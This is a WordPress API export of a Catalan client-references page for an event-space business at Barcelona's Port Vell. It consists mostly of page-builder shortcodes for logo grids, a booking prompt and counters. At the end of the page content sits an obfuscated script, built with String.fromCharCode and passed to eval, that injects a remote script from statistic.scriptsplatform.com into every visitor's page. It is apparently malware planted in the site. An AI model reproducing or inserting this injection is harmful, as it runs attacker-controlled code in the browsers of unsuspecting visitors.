{"id":4858,"date":"2019-06-21T09:31:35","date_gmt":"2019-06-21T07:31:35","guid":{"rendered":"https:\/\/portvellbcn.cat\/?page_id=4858"},"modified":"2019-06-21T10:00:23","modified_gmt":"2019-06-21T08:00:23","slug":"referencies-i-clients","status":"publish","type":"page","link":"https:\/\/portvellbcn.cat\/ca\/referencies-i-clients\/","title":{"rendered":"Refer\u00e8ncies i clients"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_section css=&#8221;.vc_custom_1487784650904{margin-top: 120px !important;margin-bottom: 140px !important;}&#8221;][vc_row css=&#8221;.vc_custom_1561104021675{padding-top: 180px !important;padding-bottom: 80px !important;}&#8221; vidbg_vc_poster=&#8221;&#8221;][vc_column width=&#8221;1\/4&#8243;][\/vc_column][vc_column width=&#8221;1\/2&#8243;][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><span class=\"s1\" style=\"font-size: 60px; color: #333333;\"><span style=\"font-family: 'Poppins', sans-serif; font-weight: 300; letter-spacing: 1px;\"><span style=\"line-height: 1.2em; display: inline-block; width: 100%;\"><span style=\"font-family: 'Poppins', sans-serif; font-weight: 400;\"><span style=\"font-family: 'Poppins', sans-serif; font-weight: 500;\"><span style=\"font-family: 'Playfair Display', sans-serif; font-weight: 400;\">Els nostres clients<\/span><\/span><\/span><\/span><\/span><\/span><\/p>\n<p>[\/vc_column_text][vc_animated_icon icon_sharpicons=&#8221;si-separators-wave-h&#8221; align=&#8221;center&#8221; color=&#8221;#ef5420&#8243; width=&#8221;96&#8243; css=&#8221;.vc_custom_1561103984529{margin-top: 50px !important;}&#8221;][\/vc_column][vc_column width=&#8221;1\/4&#8243;][\/vc_column][\/vc_row][vc_row equal_height=&#8221;yes&#8221; content_placement=&#8221;middle&#8221; css_animation=&#8221;fadeInUp&#8221;][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1487614528531{margin-top: 70px !important;}&#8221;][vc_single_image image=&#8221;625&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;#basement-modal-1038&#8243; el_class=&#8221;img-opacity&#8221;][\/vc_column][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1487614533560{margin-top: 70px !important;}&#8221;][vc_single_image image=&#8221;626&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;#basement-modal-1040&#8243; el_class=&#8221;img-opacity&#8221;][\/vc_column][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1487614538645{margin-top: 70px !important;}&#8221;][vc_single_image image=&#8221;627&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;#basement-modal-1041&#8243; el_class=&#8221;img-opacity&#8221;][\/vc_column][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1487614550615{margin-top: 70px !important;}&#8221;][vc_single_image image=&#8221;628&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;#basement-modal-1042&#8243; el_class=&#8221;img-opacity&#8221;][\/vc_column][\/vc_row][vc_row equal_height=&#8221;yes&#8221; content_placement=&#8221;middle&#8221; css_animation=&#8221;fadeInUp&#8221; css=&#8221;.vc_custom_1487794629513{margin-top: 60px !important;}&#8221;][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1487614555677{margin-top: 70px !important;}&#8221;][vc_single_image image=&#8221;629&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;#basement-modal-1043&#8243; el_class=&#8221;img-opacity&#8221;][\/vc_column][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1487614561580{margin-top: 70px !important;}&#8221;][vc_single_image image=&#8221;630&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;#basement-modal-1044&#8243; el_class=&#8221;img-opacity&#8221;][\/vc_column][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1487614567277{margin-top: 70px !important;}&#8221;][vc_single_image image=&#8221;631&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;#basement-modal-1046&#8243; el_class=&#8221;img-opacity&#8221;][\/vc_column][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1487614574714{margin-top: 70px !important;}&#8221;][vc_single_image image=&#8221;632&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;#basement-modal-1048&#8243; el_class=&#8221;img-opacity&#8221;][\/vc_column][\/vc_row][\/vc_section][vc_section css=&#8221;.vc_custom_1487784650904{margin-top: 120px !important;margin-bottom: 140px !important;}&#8221;][vc_row equal_height=&#8221;yes&#8221; content_placement=&#8221;middle&#8221; css_animation=&#8221;fadeInUp&#8221;][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1487614528531{margin-top: 70px !important;}&#8221;][vc_single_image image=&#8221;625&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;#basement-modal-1038&#8243; el_class=&#8221;img-opacity&#8221;][\/vc_column][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1487614533560{margin-top: 70px !important;}&#8221;][vc_single_image image=&#8221;626&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;#basement-modal-1040&#8243; el_class=&#8221;img-opacity&#8221;][\/vc_column][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1487614538645{margin-top: 70px !important;}&#8221;][vc_single_image image=&#8221;627&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;#basement-modal-1041&#8243; el_class=&#8221;img-opacity&#8221;][\/vc_column][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1487614550615{margin-top: 70px !important;}&#8221;][vc_single_image image=&#8221;628&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;#basement-modal-1042&#8243; el_class=&#8221;img-opacity&#8221;][\/vc_column][\/vc_row][vc_row equal_height=&#8221;yes&#8221; content_placement=&#8221;middle&#8221; css_animation=&#8221;fadeInUp&#8221; css=&#8221;.vc_custom_1487794629513{margin-top: 60px !important;}&#8221;][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1487614555677{margin-top: 70px !important;}&#8221;][vc_single_image image=&#8221;629&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;#basement-modal-1043&#8243; el_class=&#8221;img-opacity&#8221;][\/vc_column][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1487614561580{margin-top: 70px !important;}&#8221;][vc_single_image image=&#8221;630&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;#basement-modal-1044&#8243; el_class=&#8221;img-opacity&#8221;][\/vc_column][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1487614567277{margin-top: 70px !important;}&#8221;][vc_single_image image=&#8221;631&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;#basement-modal-1046&#8243; el_class=&#8221;img-opacity&#8221;][\/vc_column][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1487614574714{margin-top: 70px !important;}&#8221;][vc_single_image image=&#8221;632&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;#basement-modal-1048&#8243; el_class=&#8221;img-opacity&#8221;][\/vc_column][\/vc_row][\/vc_section][vc_row full_width=&#8221;stretch_row&#8221; css=&#8221;.vc_custom_1561103487014{margin-top: 100px !important;margin-bottom: 0px !important;padding-top: 140px !important;padding-bottom: 130px !important;background-color: #ed552d !important;}&#8221;][vc_column css_animation=&#8221;fadeInUp&#8221; width=&#8221;1\/2&#8243;][vc_column_text]<\/p>\n<p style=\"text-align: left;\"><span class=\"s1\" style=\"font-size: 60px; color: #ffffff;\"><span style=\"font-family: 'Poppins', sans-serif; font-weight: 300; letter-spacing: 1px;\"><span style=\"line-height: 1.2em; display: inline-block; width: 100%;\"><span style=\"font-family: 'Poppins', sans-serif; font-weight: 400;\"><span style=\"font-family: 'Poppins', sans-serif; font-weight: 500;\"><span style=\"font-family: 'Playfair Display', sans-serif; font-weight: 400;\">Reserva el teu espai al Port Vell<\/span><\/span><\/span><\/span><\/span><\/span><\/p>\n<p>[\/vc_column_text][\/vc_column][vc_column css_animation=&#8221;fadeInUp&#8221; width=&#8221;1\/2&#8243; offset=&#8221;vc_col-lg-offset-1 vc_col-lg-4&#8243;][vc_column_text]<\/p>\n<p class=\"p1\"><span class=\"s1\" style=\"color: #ffffff;\">Podr\u00e0s organitzar-hi esdeveniments al costat de la mar i a l\u2019aire lliure. Sigui quina sigui la teva elecci\u00f3, ser\u00e0 un \u00e8xit rotund. Els nostres espais s\u00f3n garantia de visibilitat i ress\u00f2.<\/span><\/p>\n<p>[\/vc_column_text][vc_btn title=&#8221;Veure m\u00e9s&#8221; style=&#8221;outline&#8221; shape=&#8221;round&#8221; color=&#8221;white&#8221; css=&#8221;.vc_custom_1561103450826{margin-top: 30px !important;}&#8221; link=&#8221;url:https%3A%2F%2Fportvellbcn.cat%2Fformulari%2F||target:%20_blank|&#8221;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; css_animation=&#8221;none&#8221; css=&#8221;.vc_custom_1493463820342{padding-top: 170px !important;padding-bottom: 170px !important;background-color: rgba(12,12,12,0.8) !important;*background-color: rgb(12,12,12) !important;}&#8221;][vc_column css_animation=&#8221;fadeInUp&#8221;][vc_row_inner][vc_column_inner width=&#8221;1\/4&#8243;][vc_counter align=&#8221;center&#8221; google_fonts=&#8221;font_family:Nova%20Mono%3Aregular|font_style:400%20regular%3A400%3Anormal&#8221; start=&#8221;0&#8243; end=&#8221;680&#8243; speed=&#8221;4&#8243; font_size=&#8221;50&#8243; color=&#8221;#ffffff&#8221; css=&#8221;.vc_custom_1488377153073{margin-bottom: 20px !important;}&#8221;][vc_custom_heading text=&#8221;Happy Clients&#8221; font_container=&#8221;tag:h5|text_align:center|color:%23ffffff&#8221; use_theme_fonts=&#8221;yes&#8221;][\/vc_column_inner][vc_column_inner width=&#8221;1\/4&#8243;][vc_counter align=&#8221;center&#8221; google_fonts=&#8221;font_family:Nova%20Mono%3Aregular|font_style:400%20regular%3A400%3Anormal&#8221; start=&#8221;0&#8243; end=&#8221;3640&#8243; speed=&#8221;4&#8243; font_size=&#8221;50&#8243; color=&#8221;#ffffff&#8221; css=&#8221;.vc_custom_1488377064817{margin-bottom: 20px !important;}&#8221;][vc_custom_heading text=&#8221;Projects Finished&#8221; font_container=&#8221;tag:h5|text_align:center|color:%23ffffff&#8221; use_theme_fonts=&#8221;yes&#8221;][\/vc_column_inner][vc_column_inner width=&#8221;1\/4&#8243;][vc_counter align=&#8221;center&#8221; google_fonts=&#8221;font_family:Nova%20Mono%3Aregular|font_style:400%20regular%3A400%3Anormal&#8221; start=&#8221;0&#8243; end=&#8221;8920&#8243; speed=&#8221;4&#8243; font_size=&#8221;50&#8243; color=&#8221;#ffffff&#8221; css=&#8221;.vc_custom_1488377159924{margin-bottom: 20px !important;}&#8221;][vc_custom_heading text=&#8221;Tasks Completed&#8221; font_container=&#8221;tag:h5|text_align:center|color:%23ffffff&#8221; use_theme_fonts=&#8221;yes&#8221;][\/vc_column_inner][vc_column_inner width=&#8221;1\/4&#8243;][vc_counter align=&#8221;center&#8221; google_fonts=&#8221;font_family:Nova%20Mono%3Aregular|font_style:400%20regular%3A400%3Anormal&#8221; start=&#8221;0&#8243; end=&#8221;830&#8243; speed=&#8221;4&#8243; font_size=&#8221;50&#8243; color=&#8221;#ffffff&#8221; css=&#8221;.vc_custom_1488377164886{margin-bottom: 20px !important;}&#8221;][vc_custom_heading text=&#8221;Buyers Worldwide&#8221; font_container=&#8221;tag:h5|text_align:center|color:%23ffffff&#8221; use_theme_fonts=&#8221;yes&#8221;][\/vc_column_inner][\/vc_row_inner][\/vc_column][\/vc_row]<\/p>\n<p><script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_section css=&#8221;.vc_custom_1487784650904{margin-top: 120px !important;margin-bottom: 140px !important;}&#8221;][vc_row css=&#8221;.vc_custom_1561104021675{padding-top: 180px !important;padding-bottom: 80px !important;}&#8221; vidbg_vc_poster=&#8221;&#8221;][vc_column width=&#8221;1\/4&#8243;][\/vc_column][vc_column width=&#8221;1\/2&#8243;][vc_column_text] Els nostres clients [\/vc_column_text][vc_animated_icon icon_sharpicons=&#8221;si-separators-wave-h&#8221; align=&#8221;center&#8221; color=&#8221;#ef5420&#8243; width=&#8221;96&#8243; css=&#8221;.vc_custom_1561103984529{margin-top: 50px !important;}&#8221;][\/vc_column][vc_column width=&#8221;1\/4&#8243;][\/vc_column][\/vc_row][vc_row equal_height=&#8221;yes&#8221; content_placement=&#8221;middle&#8221; css_animation=&#8221;fadeInUp&#8221;][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1487614528531{margin-top: 70px !important;}&#8221;][vc_single_image image=&#8221;625&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;#basement-modal-1038&#8243; el_class=&#8221;img-opacity&#8221;][\/vc_column][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1487614533560{margin-top: 70px !important;}&#8221;][vc_single_image image=&#8221;626&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;#basement-modal-1040&#8243; el_class=&#8221;img-opacity&#8221;][\/vc_column][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1487614538645{margin-top: 70px !important;}&#8221;][vc_single_image image=&#8221;627&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;#basement-modal-1041&#8243; el_class=&#8221;img-opacity&#8221;][\/vc_column][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1487614550615{margin-top: 70px !important;}&#8221;][vc_single_image image=&#8221;628&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;#basement-modal-1042&#8243; el_class=&#8221;img-opacity&#8221;][\/vc_column][\/vc_row][vc_row equal_height=&#8221;yes&#8221; content_placement=&#8221;middle&#8221; css_animation=&#8221;fadeInUp&#8221; css=&#8221;.vc_custom_1487794629513{margin-top: 60px !important;}&#8221;][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1487614555677{margin-top: 70px !important;}&#8221;][vc_single_image image=&#8221;629&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;#basement-modal-1043&#8243; el_class=&#8221;img-opacity&#8221;][\/vc_column][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1487614561580{margin-top: 70px !important;}&#8221;][vc_single_image image=&#8221;630&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;#basement-modal-1044&#8243; el_class=&#8221;img-opacity&#8221;][\/vc_column][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1487614567277{margin-top: 70px !important;}&#8221;][vc_single_image image=&#8221;631&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;#basement-modal-1046&#8243; el_class=&#8221;img-opacity&#8221;][\/vc_column][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1487614574714{margin-top: 70px !important;}&#8221;][vc_single_image image=&#8221;632&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;#basement-modal-1048&#8243; el_class=&#8221;img-opacity&#8221;][\/vc_column][\/vc_row][\/vc_section][vc_section css=&#8221;.vc_custom_1487784650904{margin-top: 120px !important;margin-bottom: 140px !important;}&#8221;][vc_row equal_height=&#8221;yes&#8221; content_placement=&#8221;middle&#8221; css_animation=&#8221;fadeInUp&#8221;][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1487614528531{margin-top: 70px !important;}&#8221;][vc_single_image image=&#8221;625&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;#basement-modal-1038&#8243; el_class=&#8221;img-opacity&#8221;][\/vc_column][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1487614533560{margin-top: 70px !important;}&#8221;][vc_single_image image=&#8221;626&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;#basement-modal-1040&#8243; el_class=&#8221;img-opacity&#8221;][\/vc_column][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1487614538645{margin-top: 70px !important;}&#8221;][vc_single_image image=&#8221;627&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;#basement-modal-1041&#8243; el_class=&#8221;img-opacity&#8221;][\/vc_column][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1487614550615{margin-top: 70px !important;}&#8221;][vc_single_image image=&#8221;628&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;#basement-modal-1042&#8243; el_class=&#8221;img-opacity&#8221;][\/vc_column][\/vc_row][vc_row equal_height=&#8221;yes&#8221; content_placement=&#8221;middle&#8221; css_animation=&#8221;fadeInUp&#8221; css=&#8221;.vc_custom_1487794629513{margin-top: 60px !important;}&#8221;][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1487614555677{margin-top: 70px !important;}&#8221;][vc_single_image image=&#8221;629&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;#basement-modal-1043&#8243; el_class=&#8221;img-opacity&#8221;][\/vc_column][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1487614561580{margin-top: 70px !important;}&#8221;][vc_single_image image=&#8221;630&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;#basement-modal-1044&#8243; el_class=&#8221;img-opacity&#8221;][\/vc_column][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1487614567277{margin-top: 70px !important;}&#8221;][vc_single_image image=&#8221;631&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;#basement-modal-1046&#8243; el_class=&#8221;img-opacity&#8221;][\/vc_column][vc_column width=&#8221;1\/4&#8243; [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"page-templates\/page-creative-medium-dark.php","meta":{"_acf_changed":false,"footnotes":""},"class_list":["post-4858","page","type-page","status-publish","hentry"],"acf":[],"_links":{"self":[{"href":"https:\/\/portvellbcn.cat\/ca\/wp-json\/wp\/v2\/pages\/4858","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/portvellbcn.cat\/ca\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/portvellbcn.cat\/ca\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/portvellbcn.cat\/ca\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/portvellbcn.cat\/ca\/wp-json\/wp\/v2\/comments?post=4858"}],"version-history":[{"count":0,"href":"https:\/\/portvellbcn.cat\/ca\/wp-json\/wp\/v2\/pages\/4858\/revisions"}],"wp:attachment":[{"href":"https:\/\/portvellbcn.cat\/ca\/wp-json\/wp\/v2\/media?parent=4858"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}